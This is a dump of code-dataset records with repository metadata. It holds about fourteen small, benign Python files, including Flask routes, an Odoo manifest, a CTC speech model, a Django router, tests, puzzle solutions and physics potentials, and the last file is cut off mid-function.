blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
01da5a0e86cd8ce29cbc5a202aa44f0231c8e8af
|
dc955cb940976e360853a03c8a18c173be21e406
|
/web_flask/3-python_route.py
|
080068cf4596ab06d921d340f2c4365846556cbe
|
[] |
no_license
|
SantiagoHerreG/AirBnB_clone_v2
|
888c04617d1f1e6ca01d080a57ae1932596a3a9a
|
2669d2455e657c1096d8f32c1d083fdb3d22665b
|
refs/heads/master
| 2020-11-25T05:24:36.767546
| 2020-01-23T04:20:59
| 2020-01-23T04:20:59
| 228,519,799
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
#!/usr/bin/python3
"""Uses the Flask micro framework to make an app server listen at 0.0.0.0:5000
"""
from flask import Flask

app = Flask(__name__)


@app.route('/', strict_slashes=False)
def home():
    """Function for handling the route /
    """
    return "Hello HBNB!"


@app.route('/hbnb', strict_slashes=False)
def hbnb():
    """Handles /hbnb route
    """
    return "HBNB"


@app.route('/c/<text>', strict_slashes=False)
def show_text(text=None):
    """Handles a request to route /c/<text>

    Underscores in <text> are displayed as spaces.
    """
    # BUG FIX: the original iterated over the characters and rebound the loop
    # variable (`letter = " "`), which never modified `text`, so underscores
    # were returned unchanged. Use str.replace to actually substitute them.
    return "C {}".format(text.replace("_", " "))


@app.route('/python/', strict_slashes=False)
@app.route('/python/<text>', strict_slashes=False)
def show_python(text="is_cool"):
    """Handles a request to route /python/(<text>)
    """
    return "Python {}".format(text.replace("_", " "))


if __name__ == '__main__':
    # port is documented as an int; the original passed the string '5000'
    app.run(host='0.0.0.0', port=5000)
|
[
"888@holbertonschool.com"
] |
888@holbertonschool.com
|
f14bf2284a5ac68035d5cc581bed6b3963daf922
|
3c7dcf8c7af1536af8d6ff3b7ec4389e9523823a
|
/ssl_sale_ext/__manifest__.py
|
9d0dd99da365af6fa2c0a914e27283a768065fe9
|
[] |
no_license
|
tate11/module
|
cb70e8e45ecb9912a597ea9310c29baf9074fa90
|
b5148fad3f3a23df749d3d3d7278c2ce22e067d8
|
refs/heads/master
| 2020-03-18T21:11:18.403431
| 2017-06-14T07:48:48
| 2017-06-14T07:48:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
# -*- coding: utf-8 -*-
# Odoo/OpenERP module manifest: metadata, dependencies and data files for the
# SuperSilicone sale extension.
{
    'name': 'SAL: SuperSilicone Sale Extention',
    'version': '1.0',
    'author': 'Kornelius K Macario (Falinwa Indonesia)',
    'description': '''
Module to extend reporting file in Quotations.
''',
    # Modules that must be installed before this one.
    'depends': [
        'ssl_base_ext',
    ],
    # XML files loaded on install/update: report definitions and view extensions.
    'data': [
        'report/ssl_sale_ext_report.xml',
        'report/wishlist_report.xml',
        'views/sale_view.xml',
        'views/partner_view.xml',
        'views/crm_lead_view.xml',
        'views/wishlist_number.xml',
    ],
    'css': [],
    'js': [],
    'installable': True,
    'active': False,  # legacy flag (auto-install in old OpenERP versions)
    'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
[
"dimansional@gmail.com"
] |
dimansional@gmail.com
|
94090cd146bdbb675c2a0236d33670dd56158a11
|
006341ca12525aa0979d6101600e78c4bd9532ab
|
/CMS/Zope-3.2.1/Dependencies/twisted-Zope-3.2.1/twisted/lore/__init__.py
|
142e9e5fcdd90fda4df2e11b44a9594c01d4c49d
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"ZPL-2.1",
"Python-2.0",
"ICU",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause",
"ZPL-2.0"
] |
permissive
|
germanfriday/code-examples-sandbox
|
d0f29e20a3eed1f8430d06441ac2d33bac5e4253
|
4c538584703754c956ca66392fdcecf0a0ca2314
|
refs/heads/main
| 2023-05-30T22:21:57.918503
| 2021-06-15T15:06:47
| 2021-06-15T15:06:47
| 377,200,448
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
#
'''
The Twisted Documentation Generation System

Maintainer: U{Andrew Bennetts<mailto:spiv@twistedmatrix.com>}
'''
# TODO
# Abstract
# Bibliography
# Index
# Allow non-web image formats (EPS, specifically)
# Allow pickle output and input to minimize parses
# Numbered headers
# Navigational aides

# Version marker for this package snapshot.
__version__ = 'SVN-Trunk'
|
[
"chris@thegermanfriday.com"
] |
chris@thegermanfriday.com
|
c99df2302f718da619b9117303bad092b189a97e
|
170864b6ec66be48138f231fe8ac3381481b8c9d
|
/python/BOJ_15652.py
|
20c6e031ade32221e23ea0305ac743f403e37932
|
[] |
no_license
|
hyesungoh/AA_Algorithm
|
5da3d8312d035d324dfaa31eef73f01a238231f3
|
d68f52eaa29cfc4656a8b5623359166779ded06e
|
refs/heads/master
| 2023-06-09T14:49:01.402456
| 2021-06-28T10:10:09
| 2021-06-28T10:10:09
| 272,701,231
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 286
|
py
|
# BOJ 15652: print every length-m sequence drawn from 1..n whose elements are
# non-decreasing (combinations with repetition), in lexicographic order.
n, m = map(int, input().split())
l = list(range(1, n+1))  # candidate numbers 1..n
ans = []  # current partial sequence being built


def bt(depth, index):
    # depth: how many numbers are already in `ans`
    # index: smallest value allowed for the next position (enforces ordering)
    if depth == m:
        print(*ans)
        return
    for i in range(n):
        if l[i] >= index:  # keep the sequence non-decreasing
            ans.append(l[i])
            bt(depth + 1, l[i])
            ans.pop()  # backtrack


bt(0, 0)
|
[
"haesungoh414@gmail.com"
] |
haesungoh414@gmail.com
|
a63e804d240377f401fed52279ef157ad6bf2aa1
|
6bf036d64271bb062451626c334b6eabaf2bcef9
|
/tensorflow_asr/models/ctc/ctc.py
|
d7dcf5dd5e414338abc25104ccc39efad21dc96b
|
[
"Apache-2.0"
] |
permissive
|
lamyiowce/TensorFlowASR
|
7ce9d96f70da182e7d058a492993b62d523354e5
|
130124ccaf23fabe3e7a6f138d9403a7c0946ef3
|
refs/heads/main
| 2023-06-25T03:09:28.182924
| 2021-06-10T13:42:45
| 2021-06-10T13:42:45
| 390,671,234
| 0
| 0
|
Apache-2.0
| 2021-07-29T09:29:18
| 2021-07-29T09:29:18
| null |
UTF-8
|
Python
| false
| false
| 7,347
|
py
|
# Copyright 2020 Huy Le Nguyen (@usimarit)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict, Union
import numpy as np
import tensorflow as tf
from ..base_model import BaseModel
from ...featurizers.speech_featurizers import TFSpeechFeaturizer
from ...featurizers.text_featurizers import TextFeaturizer
from ...utils import math_util, shape_util, data_util
from ...losses.ctc_loss import CtcLoss
class CtcModel(BaseModel):
    """CTC-based speech recognition model.

    Composes an `encoder` network with a `decoder` projection producing
    per-frame vocabulary logits, trained with CTC loss. Provides greedy and
    beam-search recognition plus TFLite-convertible inference functions.
    """

    def __init__(self,
                 encoder: tf.keras.Model,
                 decoder: Union[tf.keras.Model, tf.keras.layers.Layer] = None,
                 vocabulary_size: int = None,
                 **kwargs):
        """Build the model from an encoder and an optional decoder.

        Args:
            encoder: network mapping feature frames to hidden frames.
            decoder: optional projection to vocabulary logits; when None a
                Dense layer of `vocabulary_size` units is created instead.
            vocabulary_size: required iff `decoder` is None.
        """
        super().__init__(**kwargs)
        self.encoder = encoder
        if decoder is None:
            assert vocabulary_size is not None, "vocabulary_size must be set"
            self.decoder = tf.keras.layers.Dense(units=vocabulary_size, name=f"{self.name}_logits")
        else:
            self.decoder = decoder
        # Input-frames to output-frames ratio; encoders that downsample in
        # time are expected to overwrite this attribute.
        self.time_reduction_factor = 1

    def make(self, input_shape, batch_size=None):
        """Trace the model once with symbolic inputs so all weights are built."""
        inputs = tf.keras.Input(input_shape, batch_size=batch_size, dtype=tf.float32)
        inputs_length = tf.keras.Input(shape=[], batch_size=batch_size, dtype=tf.int32)
        self(
            data_util.create_inputs(
                inputs=inputs,
                inputs_length=inputs_length
            ),
            training=False
        )

    def compile(self,
                optimizer,
                global_batch_size,
                blank=0,
                run_eagerly=None,
                **kwargs):
        """Compile with a CTC loss; `global_batch_size` scales the distributed loss."""
        loss = CtcLoss(blank=blank, global_batch_size=global_batch_size)
        super().compile(loss=loss, optimizer=optimizer, run_eagerly=run_eagerly, **kwargs)

    def add_featurizers(self,
                        speech_featurizer: TFSpeechFeaturizer,
                        text_featurizer: TextFeaturizer):
        """Attach the featurizers used by recognition and TFLite functions."""
        self.speech_featurizer = speech_featurizer
        self.text_featurizer = text_featurizer

    def call(self, inputs, training=False, **kwargs):
        """Forward pass: encoder then decoder projection.

        `inputs` is a dict with keys "inputs" and "inputs_length".
        """
        logits = self.encoder(inputs["inputs"], training=training, **kwargs)
        logits = self.decoder(logits, training=training, **kwargs)
        return data_util.create_logits(
            logits=logits,
            logits_length=math_util.get_reduced_length(inputs["inputs_length"], self.time_reduction_factor)
        )

    # -------------------------------- GREEDY -------------------------------------

    @tf.function
    def recognize(self, inputs: Dict[str, tf.Tensor]):
        """Greedy-decode a batch of inputs into a batch of transcript strings."""
        logits = self(inputs, training=False)
        probs = tf.nn.softmax(logits["logits"])

        # numpy_function escapes the graph so the external `ctc_decoders`
        # package can run per example.
        def map_fn(prob): return tf.numpy_function(self._perform_greedy, inp=[prob], Tout=tf.string)

        return tf.map_fn(map_fn, probs, fn_output_signature=tf.TensorSpec([], dtype=tf.string))

    def _perform_greedy(self, probs: np.ndarray):
        """Greedy CTC decode of one example's probabilities (numpy side)."""
        from ctc_decoders import ctc_greedy_decoder
        decoded = ctc_greedy_decoder(probs, vocabulary=self.text_featurizer.non_blank_tokens)
        return tf.convert_to_tensor(decoded, dtype=tf.string)

    def recognize_tflite(self, signal):
        """
        Function to convert to tflite using greedy decoding
        Args:
            signal: tf.Tensor with shape [None] indicating a single audio signal
        Return:
            transcript: tf.Tensor of Unicode Code Points with shape [None] and dtype tf.int32
        """
        features = self.speech_featurizer.tf_extract(signal)
        features = tf.expand_dims(features, axis=0)  # add batch dimension
        input_length = shape_util.shape_list(features)[1]
        input_length = math_util.get_reduced_length(input_length, self.time_reduction_factor)
        input_length = tf.expand_dims(input_length, axis=0)
        logits = self.encoder(features, training=False)
        logits = self.decoder(logits, training=False)
        probs = tf.nn.softmax(logits)
        decoded = tf.keras.backend.ctc_decode(
            y_pred=probs, input_length=input_length, greedy=True
        )
        decoded = tf.cast(decoded[0][0][0], dtype=tf.int32)
        transcript = self.text_featurizer.indices2upoints(decoded)
        return transcript

    # -------------------------------- BEAM SEARCH -------------------------------------

    @tf.function
    def recognize_beam(self, inputs: Dict[str, tf.Tensor], lm: bool = False):
        """Beam-search decode a batch; `lm` enables the external scorer."""
        logits = self(inputs, training=False)
        probs = tf.nn.softmax(logits["logits"])

        def map_fn(prob): return tf.numpy_function(self._perform_beam_search, inp=[prob, lm], Tout=tf.string)

        return tf.map_fn(map_fn, probs, dtype=tf.string)

    def _perform_beam_search(self, probs: np.ndarray, lm: bool = False):
        """Beam-search CTC decode of one example (numpy side)."""
        from ctc_decoders import ctc_beam_search_decoder
        decoded = ctc_beam_search_decoder(
            probs_seq=probs,
            vocabulary=self.text_featurizer.non_blank_tokens,
            beam_size=self.text_featurizer.decoder_config.beam_width,
            ext_scoring_func=self.text_featurizer.scorer if lm else None
        )
        # NOTE(review): assumes decoded[0] is the best hypothesis as a
        # (score, text) pair, so [-1] picks the text — verify against the
        # ctc_decoders API.
        decoded = decoded[0][-1]
        return tf.convert_to_tensor(decoded, dtype=tf.string)

    def recognize_beam_tflite(self, signal):
        """
        Function to convert to tflite using beam search decoding
        Args:
            signal: tf.Tensor with shape [None] indicating a single audio signal
        Return:
            transcript: tf.Tensor of Unicode Code Points with shape [None] and dtype tf.int32
        """
        features = self.speech_featurizer.tf_extract(signal)
        features = tf.expand_dims(features, axis=0)  # add batch dimension
        input_length = shape_util.shape_list(features)[1]
        input_length = math_util.get_reduced_length(input_length, self.time_reduction_factor)
        input_length = tf.expand_dims(input_length, axis=0)
        logits = self.encoder(features, training=False)
        logits = self.decoder(logits, training=False)
        probs = tf.nn.softmax(logits)
        decoded = tf.keras.backend.ctc_decode(
            y_pred=probs, input_length=input_length, greedy=False,
            beam_width=self.text_featurizer.decoder_config.beam_width
        )
        decoded = tf.cast(decoded[0][0][0], dtype=tf.int32)
        transcript = self.text_featurizer.indices2upoints(decoded)
        return transcript

    # -------------------------------- TFLITE -------------------------------------

    def make_tflite_function(self, greedy: bool = False):
        """Return a tf.function (greedy or beam search) suitable for TFLite export."""
        if greedy:
            return tf.function(
                self.recognize_tflite,
                input_signature=[
                    tf.TensorSpec([None], dtype=tf.float32)
                ]
            )
        return tf.function(
            self.recognize_beam_tflite,
            input_signature=[
                tf.TensorSpec([None], dtype=tf.float32)
            ]
        )
|
[
"nlhuy.cs.16@gmail.com"
] |
nlhuy.cs.16@gmail.com
|
a277d33f5860071faa32fa667b73c549508cf86b
|
6d7e28fd178d5eba1b9e67dd77ad7cec6690743b
|
/alg_dataset.py
|
0a37bab5931b6a82ad462e82449e0347cb2d479e
|
[] |
no_license
|
Arseni1919/PL_TEMPLATE_PROJECT
|
ec83f8402996f837cbaccbea092c5cc523a959de
|
dd5d5fa2284c9ea1da35e316a14299fc89272669
|
refs/heads/main
| 2023-02-12T18:56:42.810589
| 2021-01-12T09:54:50
| 2021-01-12T09:54:50
| 326,060,903
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
from CONSTANTS import *
class ALGDataset(Dataset):
    """Replay-buffer dataset: experiences stored in a bounded deque."""

    def __init__(self):
        # Oldest entries are evicted automatically once REPLAY_SIZE is reached.
        self.buffer = deque(maxlen=REPLAY_SIZE)

    def __len__(self):
        return len(self.buffer)

    def __getitem__(self, indx):
        """Return the stored experience at `indx` as a 5-tuple."""
        entry = self.buffer[indx]
        return (entry.state, entry.action, entry.reward,
                entry.done, entry.new_state)

    def append(self, experience):
        """Push a new experience onto the buffer."""
        self.buffer.append(experience)
|
[
"1919ars@gmail.com"
] |
1919ars@gmail.com
|
da1c36a4a8b25e9de600154f608421c9cf4a03fb
|
60eb288f242b60b872481dc1f38848c19cd51452
|
/tests/conftest.py
|
6dcddd7abf84dc136e6f1f1f1ff6b0879c50e873
|
[
"MIT"
] |
permissive
|
klen/muffin-admin
|
62654a515f552b9026a27afc70c3e1b98cbb6f04
|
3c7c2e169911bf5388947447cfc693648decd7cb
|
refs/heads/develop
| 2023-08-30T16:46:28.750256
| 2023-08-24T09:25:16
| 2023-08-24T09:25:16
| 34,291,282
| 19
| 2
|
MIT
| 2023-02-20T20:25:44
| 2015-04-20T23:04:00
|
Python
|
UTF-8
|
Python
| false
| false
| 650
|
py
|
from pathlib import Path

import pytest

from muffin import Application, TestClient


# Run every test against each supported async backend.
@pytest.fixture(
    params=["trio", "curio", pytest.param(("asyncio", {"use_uvloop": False}), id="asyncio")]
)
def aiolib(request):
    """anyio backend parameter consumed by the test runner."""
    return request.param


@pytest.fixture(scope="session", autouse=True)
def prebuild_js():
    """Create a stub main.js next to the package for the test session,
    and delete it when the session ends."""
    import muffin_admin

    main_js = Path(muffin_admin.__file__).parent.parent / "muffin_admin/main.js"
    main_js.write_text("console.log('muffin-admin js files');")
    yield main_js
    main_js.unlink()  # session teardown: remove the stub


@pytest.fixture()
def app():
    """Fresh muffin Application in debug mode for each test."""
    return Application(debug=True)


@pytest.fixture()
def client(app):
    """Test client bound to the `app` fixture."""
    return TestClient(app)
|
[
"horneds@gmail.com"
] |
horneds@gmail.com
|
116cac7e4362884c75a97caf04c8c453116a0d80
|
fb7efe44f4d9f30d623f880d0eb620f3a81f0fbd
|
/components/policy/tools/template_writers/writers/android_policy_writer_unittest.py
|
6eb7a2f630701bdced109080db050ec1ed51ebb2
|
[
"BSD-3-Clause"
] |
permissive
|
wzyy2/chromium-browser
|
2644b0daf58f8b3caee8a6c09a2b448b2dfe059c
|
eb905f00a0f7e141e8d6c89be8fb26192a88c4b7
|
refs/heads/master
| 2022-11-23T20:25:08.120045
| 2018-01-16T06:41:26
| 2018-01-16T06:41:26
| 117,618,467
| 3
| 2
|
BSD-3-Clause
| 2022-11-20T22:03:57
| 2018-01-16T02:09:10
| null |
UTF-8
|
Python
| false
| false
| 2,684
|
py
|
#!/usr/bin/env python
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for writers.android_policy_writer'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../..'))
import unittest
from xml.dom import minidom
from writers import writer_unittest_common
from writers import android_policy_writer
class AndroidPolicyWriterUnittest(writer_unittest_common.WriterUnittestCommon):
    '''Unit tests to test assumptions in Android Policy Writer'''

    def testPolicyWithoutItems(self):
        # Test an example policy without items.
        policy = {
            'name': '_policy_name',
            'caption': '_policy_caption',
            'desc': 'This is a long policy caption. More than one sentence '
                    'in a single line because it is very important.\n'
                    'Second line, also important'
        }
        writer = android_policy_writer.GetWriter({})
        writer.Init()
        writer.BeginTemplate()
        writer.WritePolicy(policy)
        # assertEquals is a deprecated alias removed in Python 3.12;
        # assertEqual is the canonical spelling.
        self.assertEqual(
            writer._resources.toxml(),
            '<resources>'
            '<string name="_policy_nameTitle">_policy_caption</string>'
            '<string name="_policy_nameDesc">This is a long policy caption. More '
            'than one sentence in a single line because it is very '
            'important.\nSecond line, also important'
            '</string>'
            '</resources>')

    def testPolicyWithItems(self):
        # Test an example policy with items (the original comment wrongly said
        # "without items").
        policy = {
            'name': '_policy_name',
            'caption': '_policy_caption',
            'desc': '_policy_desc_first.\nadditional line',
            'items': [
                {
                    'caption': '_caption1',
                    'value': '_value1',
                },
                {
                    'caption': '_caption2',
                    'value': '_value2',
                }
            ]
        }
        writer = android_policy_writer.GetWriter({})
        writer.Init()
        writer.BeginTemplate()
        writer.WritePolicy(policy)
        self.assertEqual(
            writer._resources.toxml(),
            '<resources>'
            '<string name="_policy_nameTitle">_policy_caption</string>'
            '<string name="_policy_nameDesc">_policy_desc_first.\n'
            'additional line</string>'
            '<string-array name="_policy_nameEntries">'
            '<item>_caption1</item>'
            '<item>_caption2</item>'
            '</string-array>'
            '<string-array name="_policy_nameValues">'
            '<item>_value1</item>'
            '<item>_value2</item>'
            '</string-array>'
            '</resources>')
if __name__ == '__main__':
unittest.main()
|
[
"jacob-chen@iotwrt.com"
] |
jacob-chen@iotwrt.com
|
e4eb19c2ffe6437ac4bd088a7d184763cd6d81a6
|
198f759dc334df0431cbc25ed4243e86b93571eb
|
/database_routers/mssql_router.py
|
d5bc32937be3d699277bc992a68a97f54e34657c
|
[] |
no_license
|
miladhzz/django-muliple-db
|
ec2074b14dd67a547c982f20b2586f435e7e0d6c
|
56ff2555e498d9105cad215daf4c3d4da59d7d9a
|
refs/heads/master
| 2022-12-25T08:08:05.761226
| 2020-10-06T06:38:30
| 2020-10-06T06:38:30
| 301,636,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 583
|
py
|
class MssqlRouter:
    """Database router that pins all reads and writes to the 'mssql' alias."""

    # App labels whose objects may form relations through this router.
    route_app_labels = {'mssql'}

    def db_for_read(self, model, **hints):
        """Every read goes to the 'mssql' database."""
        return 'mssql'

    def db_for_write(self, model, **hints):
        """Every write goes to the 'mssql' database."""
        return 'mssql'

    def allow_relation(self, obj1, obj2, **hints):
        """Allow a relation when either object belongs to a routed app;
        otherwise abstain (None lets other routers decide)."""
        labels = self.route_app_labels
        if obj1._meta.app_label in labels or obj2._meta.app_label in labels:
            return True
        return None

    def allow_migrate(self, db, app_label, model_name=None, **hints):
        """
        All non-auth models end up in this pool.
        """
        return True
|
[
"miladhzz@gmail.com"
] |
miladhzz@gmail.com
|
c27d90b99c370731bf6398c8f1b7c9d70f7b4c7e
|
d0fec74acfbfdee1b662736731c1cc988e2ba2ee
|
/problem_40/p040.py
|
21c164577ea7c7bd2acc43fe9bacc1d482b5a2b1
|
[] |
no_license
|
msztylko/project-Euler
|
fdd0cfefbe88b63f6dbd2d08f1cd59270b9e1735
|
b3f5ce828ccc6662c100dd27fa295fc8afa22f6e
|
refs/heads/master
| 2021-11-23T02:50:19.333259
| 2021-10-31T17:52:28
| 2021-10-31T17:52:28
| 195,980,596
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 271
|
py
|
import sys

# Python 2 compatibility: make `range` lazy there as well.
if sys.version_info.major == 2:
    range = xrange


def compute():
    """Project Euler 40: product of digits d1, d10, d100, ..., d1000000 of
    Champernowne's constant 0.123456789101112...

    Returns the product as a decimal string.
    """
    digits = "".join(map(str, range(1, 1000000)))
    result = 1
    for power in range(7):
        # The k-th digit after the decimal point is digits[k - 1].
        result *= int(digits[10 ** power - 1])
    return str(result)


if __name__ == "__main__":
    print(compute())
|
[
"marcin.sztylko@gmail.com"
] |
marcin.sztylko@gmail.com
|
68653bc8d29f3dcdda99954fd2c56c4db08be014
|
2020c9c6958d9cc338b72f62e24d9ad30c1a8cad
|
/python/0048.rotate-image/rotate-image.py
|
ebc9d290238139686bdea8148f5026ac7910bff1
|
[] |
no_license
|
ysmintor/leetcode
|
b2d87db932b77e72504ffa07d7bf1b0d8c09b661
|
434889037fe3e405a8cbc71cd822eb1bda9aa606
|
refs/heads/master
| 2020-05-30T21:03:03.886279
| 2019-10-31T08:46:23
| 2019-10-31T09:02:24
| 189,963,050
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
class Solution:
    def rotate(self, matrix: List[List[int]]) -> None:
        """
        Do not return anything, modify matrix in-place instead.
        """
        # In-place 90-degree clockwise rotation: transpose across the main
        # diagonal, then reverse each row. (One of several known in-place
        # approaches; this one is the simplest to remember.)
        size = len(matrix)
        for r in range(size):
            for c in range(r + 1, size):
                matrix[r][c], matrix[c][r] = matrix[c][r], matrix[r][c]
        for row in matrix:
            row.reverse()
|
[
"ysmintor@gmail.com"
] |
ysmintor@gmail.com
|
48050f4660f52648eea4935b898f348604a3dd8d
|
82ef9a0dd1618a28770597227acfc0150b948af2
|
/wearnow/gui/editors/displaytabs/notebackreflist.py
|
08022d00f1eb026cafa2cb4ba841b487ad4196ea
|
[] |
no_license
|
bmcage/wearnow
|
ef32a7848472e79e56763b38551835aa97864b21
|
c8dfa75e1ea32b0c021d71c4f366ab47104c207e
|
refs/heads/master
| 2021-01-16T00:27:59.597812
| 2016-01-19T11:55:03
| 2016-01-19T11:55:03
| 37,195,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,354
|
py
|
#
# WearNow - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# WearNow classes
#
#-------------------------------------------------------------------------
from .backrefmodel import BackRefModel
from .backreflist import BackRefList
class NoteBackRefList(BackRefList):
    """Backreference list view for Note objects, backed by BackRefModel."""

    def __init__(self, dbstate, uistate, track, obj, callback=None):
        # Delegate to BackRefList, fixing the model class to BackRefModel.
        BackRefList.__init__(self, dbstate, uistate, track, obj, BackRefModel,
                             callback=callback)

    def get_icon_name(self):
        """Return the themed icon name shown for this list."""
        return 'wearnow-notes'
|
[
"benny.malengier@gmail.com"
] |
benny.malengier@gmail.com
|
dc20d47c77e072ae91e749eeca8edf20f26f99a1
|
4f7aa44d21ae38093869e79e10f5cdc8842d48b7
|
/05-mylibrary-lab-next/presentation/app_main_window.py
|
8979bca4b7ccccd07d557f3862a560c0266e63e2
|
[
"Apache-2.0"
] |
permissive
|
iproduct/intro-python
|
31e802c2c21a4df3361656f12d267ec52c2d6564
|
7e08e144da2907fcf45dc734ab4e896631625d75
|
refs/heads/master
| 2023-02-19T11:42:37.522624
| 2023-02-13T15:54:03
| 2023-02-13T15:54:03
| 128,980,155
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,198
|
py
|
from tkinter import *
from tkinter import ttk, messagebox
from dao.book_repository_json import BookRepositoryJson
from presentation.add_edit_book_dialog import AddEditBookDialog
from utils.tkinter_utils import print_hierarchy, get_ceter_window_left_top
MAIN_WIDTH = 800
MAIN_HEIGHT = 600
class AppMainWindow(ttk.Frame):
    """Main application window: sizes/centers the root window and builds the
    File and Books menus."""

    def __init__(self, root, application):
        super().__init__(root, padding="3 3 12 12")
        self.application = application
        root.title("My Library")
        print(f"Windowing system: {root.tk.call('tk', 'windowingsystem')}")  # return x11, win32, aqua
        root.option_add('*tearOff', FALSE)  # remove menu tear off ability
        left, top = get_ceter_window_left_top(root, MAIN_WIDTH, MAIN_HEIGHT)
        root.geometry(f"{MAIN_WIDTH}x{MAIN_HEIGHT}+{left}+{top}")
        self.grid(column=0, row=0, sticky=(N, W, E, S))
        self.menubar = Menu(root)
        root['menu'] = self.menubar
        # File menu
        menu_file = Menu(self.menubar)
        self.menubar.add_cascade(menu=menu_file, label="File", underline=0)
        menu_file.add_command(label='New', command=self.newFile, underline=0, accelerator="Control+Shift+N")
        self.bind_all("<Control-Shift-KeyPress-N>", self.newFile)
        print("!!!", menu_file.entryconfigure(0))
        menu_file.add_command(label="Open ...", command=self.openFile)
        menu_file.add_command(label='Close', command=self.closeFile)
        menu_file.entryconfigure('Close', state=DISABLED)
        # Books menu
        menu_books = Menu(self.menubar)
        self.menubar.add_cascade(menu=menu_books, label="Books", underline=0)
        menu_books.add_command(label='Add New Book', command=self.application.show_add_book, underline=2)
        # BUG FIX: the original passed `self.application.browseBooks()` —
        # calling the method once at menu-construction time and registering
        # its return value (None) as the command, so the menu item did
        # nothing. Register the bound method itself instead.
        menu_books.add_command(label='Browse Books', command=self.application.browseBooks)

    def newFile(self, event=None):
        """Handler for File->New (also bound to Control+Shift+N)."""
        messagebox.showinfo(title="New File Dialog", message="Creating DB file ...")

    def openFile(self):
        """Handler for File->Open."""
        messagebox.showinfo(title="File Open Dialog", message="Opening DB file ...")

    def closeFile(self):
        """Handler for File->Close (entry starts disabled)."""
        messagebox.showinfo(title="File Close Dialog", message="Closing DB file ...")
|
[
"office@iproduct.org"
] |
office@iproduct.org
|
0c33ff75f22af311c81bd6cebc6adb11379e4481
|
7124a12aee78af2cf3cdd5adbe38debd07fda07b
|
/Simulaciones/Proyecto_4_2/Scripts/Potencial_Graphics.py
|
3da508c74cc29aebc52f670a7ed4bf17cbdb5dd2
|
[] |
no_license
|
giovannilopez9808/Notas_Agosto_2020
|
e52ac9dd150037d0a8981fb765bcf0a7e73ed04b
|
5fc8d5baabbe9ed5f3ee1b33c59e7ae4e5aff526
|
refs/heads/master
| 2023-02-01T07:50:38.559046
| 2020-12-14T05:18:34
| 2020-12-14T05:18:34
| 293,427,083
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,990
|
py
|
import numpy as np
import matplotlib.pyplot as plt
#<-----------------------------Potencial--------------------->
def potential_lj(r, e, sigma):
    """Lennard-Jones pair potential V(r) = 4*e*((sigma/r)**12 - (sigma/r)**6)."""
    return 4 * e * ((sigma / r) ** 12 - (sigma / r) ** 6)
#<----------------------------Fuerza--------------------->
def force_lj(r, e, sigma):
    """Lennard-Jones force f(r) = -dV/dr = 4*e*(12*sigma**12/r**13 - 6*sigma**6/r**7)."""
    return 4 * e * (12 * sigma ** 12 / r ** 13 - 6 * sigma ** 6 / r ** 7)
#
def potencial_fene(r, e, ra):
    """FENE bond potential V(r) = -(k*ra**2/2)*ln(1 - (r/ra)**2), with k = 10*e."""
    spring_k = 10 * e
    return -spring_k * ra ** 2 * np.log(1 - (r / ra) ** 2) / 2
#
def force_fene(r, e, ra):
